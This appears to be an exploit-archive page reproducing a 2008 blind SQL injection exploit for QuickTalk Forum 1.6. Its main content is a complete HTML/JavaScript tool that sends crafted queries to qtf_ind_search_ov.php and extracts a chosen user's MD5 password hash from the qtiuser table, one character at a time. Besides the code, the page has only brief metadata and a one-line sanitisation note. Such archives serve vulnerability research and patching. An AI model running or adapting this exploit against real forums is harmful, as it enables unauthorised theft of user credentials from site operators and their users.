header-logo
Suggest Exploit
vendor:
QuickTalk Forum
by:
t0pP8uZz & xprog
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: QuickTalk Forum
Affected Version From: 1.6
Affected Version To: 1.6
Patch Exists: NO
Related CWE: N/A
CPE: a:quicktalk_forum:quicktalk_forum
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

QuickTalk Forum <= 1.6 Blind SQL Injection Exploit

This exploit is used to gain access to the passwords of users stored in the qtiuser table of the QuickTalk Forum version 1.6 and below. The exploit uses a blind SQL injection vulnerability in the qtf_ind_search_ov.php file to extract the passwords in MD5 format.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

<html>
<head>
<title>QuickTalk Forum <= 1.6 Blind SQL Injection Exploit</title>
<script language="Javascript" type="text/javascript">
/*
	-----------------------------------------------------------------------------------------------
	- QuickTalk Forum Blind SQL Injection Exploit (qtf_ind_search_ov.php) -
	- Info ---------------------------------------------------------------------------------------
	- Author: t0pP8uZz & xprog -----------------------------------------------------------
	- Exploit Coded By t0pP8uZz ---------------------------------------------------------
	- Site: h4ck-y0u.org / milw0rm.com ------------------------------------------------
	----------------------------------------------------------------------------------------------
	- Passwords ARE IN MD5           ----------------------------------------------------
	- Peace -----------------------------------------------------------------------------------
	---------------------------------------------------------------------------------------------
*/

var site, uid, res = "";

function Start() {
	
	site = document.getElementById("site").value;
	uid  = document.getElementById("pid").value;
	document.getElementById("output").value = "Exploiting, Please Wait..";
	
	Main(1, 48);
}

function Main(substr, num) {

	var xmlhttp = false;
	var url     = site+"/qtf_ind_search_ov.php?a=user&id=1 and ASCII(SUBSTRING((SELECT pwd FROM qtiuser WHERE id="+uid+" LIMIT 0,1),"+substr+",1))="+num+"/*";
	
	try {
		xmlhttp = new XMLHttpRequest();
	} catch(e) { alert("Unsupported Browser! Run Exploit In Mozilla Firefox!"); }
	
	if(xmlhttp) {
	
		netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
		xmlhttp.onreadystatechange = function() {
		
			if(xmlhttp.readyState == 4) {
			
				var content = xmlhttp.responseText;
				
				var ele = document.getElementById("output");
				if(!content.match(/0 Found/i)) {
					res += String.fromCharCode(num);
					ele.value = res;
					num = 48;
					substr++;
				}
				else {
					if(num == 59) { num = 96; }
					else { num++; }
				}
				
				if(res.length >= 32) { alert("Exploitation Successfull!. Admin MD5 Hash: "+res); return true; }
				Main(substr, num)
			}
		};
		xmlhttp.open("GET", url, true);
		xmlhttp.send(null);
	}
}

</script>
<style type="text/css">
<!--
.style1{color: #CC0000}
.style2 { color: #000000;  font-size: 12px;}
.style3 {color: #FF0000; font-weight: bold; font-size: 12px; }
.style4 {color: #FF0000; font-size: 10px;}
-->
</style>
</head>
<body>
<p class="style1">- QuickTalk Forum <= 1.6 Blind SQL Injection Exploit -</p>
<p class="style2">Site: <input type="text" id="site" /> (URL to QuickTalk Forum site ie: http://www.site.com/quicktalkforum)</p>
<p class="style2">User: <input type="text" id="pid" /> (UserID of the user you want the MD5 hash too.)</p>
<p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p>
<p class="style3">Output (MD5 Hash): <input type="text" id="output" size="100" /></p> (Do not touch untill exploit says its done)
<p class="style2">Notes: QuickTalk Forum uses the MD5 algorithms to encrypt passwords</p>
<p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p>
</body>
</html>

# milw0rm.com [2008-03-12]

Navigation

Suggest Exploit

Services By CQR